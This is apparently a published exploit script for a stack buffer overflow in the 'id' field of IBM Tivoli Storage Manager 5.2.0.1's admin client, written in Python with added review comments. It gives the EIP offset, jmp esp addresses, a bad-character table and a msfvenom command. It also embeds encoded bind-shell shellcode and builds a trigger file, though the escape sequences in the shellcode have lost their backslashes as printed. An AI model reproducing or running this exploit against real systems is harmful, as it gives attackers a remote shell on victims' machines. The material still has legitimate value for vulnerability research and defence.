Authored by Paolo Stagno

IBM Tivoli Storage Manager version 5.2.0.1 suffers from a stack-based buffer overflow vulnerability in its command line administrative interface.

# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - 'id' Field Stack Based Buffer Overflow
# Exploit Author: Paolo Stagno aka VoidSec
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
# Version: 5.2.0.1
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041

"""
Usage: in IBM Tivoli Storage Manager, paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" into the "id" field and press "ENTER"

PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"
FileName : dsmadmc.exe
ARCH : I386
DotNET : False
ASLR : True
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : False
ControlFlowGuard : False
HighentropyVA : False
"""

# [ buffer ]
# [ 68 byte | EIP | rest of the buffer ]
# ^_ESP
"""
EIP contains normal pattern : 0x33634132 (offset 68)
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)

JMP ESP Pointers:
0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
"""

#!/usr/bin/python
# NOTE(review): this shebang follows the header text above, so it is not on the
# first line of the file and has no effect when the script is executed directly.
# The str/bytes concatenation further down only works where both are the same
# type, i.e. Python 2 — presumably the interpreter the shebang was meant for.
import struct

# Total length of the buffer written to the output file: filler + 4-byte return
# address + payload + "C" padding. The original remark here read "4000 bytes",
# which does not match the value; the header's pattern run used a 3928-byte
# pattern, so 800 is presumably a trimmed size chosen once the offsets were
# known — TODO confirm.
buff_max_length=800
# Number of filler bytes before the saved return address is overwritten; matches
# the "offset 68" reported for EIP in the header.
eip_offset=68
# Author's bad-character analysis, pasted as a string literal rather than a
# comment. BAD CHARS are bytes the target alters or drops before they reach
# memory; the table compares each byte as written ("File") with what was
# observed afterwards ("Memory"). NOTE(review): as printed, the escape
# sequences in this block have lost their backslash prefix in extraction.
"""
BAD CHARS: x00x08x09x0ax0dx1ax1bx7f

GOOD CHARS:
asciiprint x20-x7e

MOD CHARS:
x00 -> x20
,-----------------------------------------------.
| Comparison results: |
|-----------------------------------------------|
| 80 81 82 83 84 85 86 87| File
| 3f 3f 2c 9f 2c 2e 2b d8| Memory
80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
|5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
|7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
|22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
|2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
|45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
|4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
|8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
f0 |f8 f9 fa fb fc fd fe ff | File
|6f 97 a3 96 81 79 5f 98 | Memory
`-----------------------------------------------'
"""
# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "x00x08x09x0ax0dx1ax1bx7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
# Payload produced by the command above: a bind shell run through the
# x86/alpha_mixed encoder so that it stays within the printable range listed
# under GOOD CHARS, with ESP as the decoder's base register (consistent with
# the jmp esp return address used below).
# NOTE(review): the escape sequences in this listing have lost their backslash
# prefix in extraction, so the literal as printed is plain ASCII text rather
# than the encoded bytes; the hex values themselves were not verified here.
# Defender's view: several hundred bytes of printable-but-meaningless text in a
# short administrative field such as "id" is a distinctive pattern, both for
# input logging and for a server-side length check on that field.
shellcode = b""
shellcode += b"x54x59x49x49x49x49x49x49x49x49x49"
shellcode += b"x49x49x49x49x49x49x49x37x51x5ax6a"
shellcode += b"x41x58x50x30x41x30x41x6bx41x41x51"
shellcode += b"x32x41x42x32x42x42x30x42x42x41x42"
shellcode += b"x58x50x38x41x42x75x4ax49x78x59x78"
shellcode += b"x6bx4dx4bx6bx69x62x54x61x34x6ax54"
shellcode += b"x76x51x6ax72x6cx72x54x37x45x61x4f"
shellcode += b"x39x61x74x4ex6bx62x51x66x50x6cx4b"
shellcode += b"x53x46x34x4cx6cx4bx32x56x35x4cx6e"
shellcode += b"x6bx67x36x37x78x6ex6bx43x4ex51x30"
shellcode += b"x4cx4bx67x46x74x78x50x4fx72x38x42"
shellcode += b"x55x6cx33x30x59x56x61x38x51x39x6f"
shellcode += b"x49x71x73x50x4ex6bx70x6cx31x34x54"
shellcode += b"x64x6ex6bx73x75x67x4cx4ex6bx66x34"
shellcode += b"x46x48x74x38x45x51x69x7ax4cx4bx31"
shellcode += b"x5ax67x68x6ex6bx42x7ax51x30x46x61"
shellcode += b"x6ax4bx68x63x36x54x47x39x6cx4bx35"
shellcode += b"x64x6cx4bx67x71x5ax4ex74x71x6bx4f"
shellcode += b"x64x71x6fx30x59x6cx6cx6cx6fx74x39"
shellcode += b"x50x50x74x43x37x49x51x58x4fx34x4d"
shellcode += b"x77x71x6fx37x5ax4bx6cx34x35x6bx53"
shellcode += b"x4cx35x74x35x78x73x45x48x61x6cx4b"
shellcode += b"x42x7ax75x74x66x61x5ax4bx50x66x4c"
shellcode += b"x4bx46x6cx70x4bx4ex6bx31x4ax77x6c"
shellcode += b"x76x61x68x6bx4ex6bx53x34x6cx4bx53"
shellcode += b"x31x4ax48x4ex69x37x34x56x44x65x4c"
shellcode += b"x70x61x38x43x4fx42x45x58x61x39x38"
shellcode += b"x54x6fx79x48x65x4fx79x59x52x43x58"
shellcode += b"x4cx4ex32x6ex36x6ex7ax4cx72x72x49"
shellcode += b"x78x4fx6fx4bx4fx6bx4fx6bx4fx4ex69"
shellcode += b"x42x65x54x44x6fx4bx73x4ex68x58x4b"
shellcode += b"x52x44x33x6cx47x75x4cx37x54x42x72"
shellcode += b"x4dx38x6ex6ex69x6fx59x6fx49x6fx6d"
shellcode += b"x59x57x35x73x38x70x68x32x4cx52x4c"
shellcode += b"x67x50x71x51x75x38x65x63x76x52x76"
shellcode += b"x4ex42x44x61x78x34x35x54x33x71x75"
shellcode += b"x73x42x70x30x79x4bx6bx38x61x4cx31"
shellcode += b"x34x57x7ax4cx49x59x76x31x46x69x6f"
shellcode += b"x33x65x67x74x4fx79x6ax62x32x70x6d"
shellcode += b"x6bx4dx78x6fx52x42x6dx4fx4cx6fx77"
shellcode += b"x55x4cx75x74x53x62x79x78x61x4fx79"
shellcode += b"x6fx6bx4fx79x6fx30x68x42x4fx62x58"
shellcode += b"x63x68x77x50x73x58x70x61x30x67x33"
shellcode += b"x55x50x42x43x58x32x6dx70x65x61x63"
shellcode += b"x32x53x76x51x69x4bx6dx58x33x6cx51"
shellcode += b"x34x35x5ax4bx39x6bx53x72x48x70x58"
shellcode += b"x47x50x55x70x57x50x42x48x62x50x63"
shellcode += b"x47x70x6ex35x34x34x71x6fx39x4cx48"
shellcode += b"x30x4cx74x64x67x74x6ex69x4bx51x54"
shellcode += b"x71x58x52x62x72x36x33x62x71x71x42"
shellcode += b"x79x6fx68x50x74x71x79x50x76x30x69"
shellcode += b"x6fx50x55x54x48x41x41"

# Assemble the trigger string in the layout sketched in the header:
# [ eip_offset filler | 4-byte return address | payload | "C" padding ].
buff = ""
buff += "A" * eip_offset
# Little-endian return address for the jmp esp in dbghelp.dll (0x02803d7b in the
# header's list). The value written differs because the target rewrites some
# input bytes: the comparison table shows a 0xc7 byte in the file arriving in
# memory as 0x80, so 0x02c73d7b is what has to be supplied for 0x02803d7b to be
# what lands on the stack.
buff += struct.pack("<I",0x02c73d7b) # 0x02803d7b cause char modification needs to be written as 0x02c73d7b
# NOTE(review): buff is str while shellcode is bytes; this concatenation only
# succeeds where the two are the same type (Python 2, which the shebang
# suggests) — on Python 3 it raises TypeError.
buff += shellcode
# Pad to the fixed total so the file is always buff_max_length bytes long.
buff += "C" * (buff_max_length - len(buff))

print("Writing {} bytes".format(len(buff)))
# Write the file whose content is pasted into the "id" field (see Usage above).
# NOTE(review): explicit open/close pair; a with-block would guarantee the close
# if write() fails. The header reports DEP: True for dsmadmc.exe, yet the
# payload executes from the stack via jmp esp; whether DEP is actually enforced
# for this process on the test host is not shown here — confirm. On the
# defensive side the fixed return address relies on dbghelp.dll loading without
# ASLR (header: ASLR: False); forcing image randomization for the process
# removes that assumption independently of a vendor fix.
f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
f.write(buff)
f.close()